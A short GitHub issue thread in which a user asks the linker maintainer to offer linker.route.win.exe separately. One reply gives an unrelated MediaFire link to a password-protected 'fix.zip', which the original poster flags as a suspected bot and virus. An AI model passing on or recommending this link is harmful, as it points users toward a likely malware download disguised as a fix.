### ISSUE TITLE
detach linker.route.win.exe and download it separately

### ISSUE THREAD

**Issue by RemMai** [snltty/linker#10]
Hi,Master!
I think your software is very good.
Especially linker.route.win.exe, which solved an important issue between my two networks.
Do you plan to detach linker.route.win.exe and download it separately?
tks~😋

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RemMai** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

no!!!!!
After I raised the issue, you answered quickly. I suspect you are a robot, and I cannot trust your program. I have reason to suspect that your program is a virus. Please do not download!!!

**Comment by snltty** [comment]
Hi bro, your suggestion is very good！
but，I won't accept it

**Comment by RemMai** [comment]
> Hi bro, your suggestion is very good！ but，I won't accept it

qwq
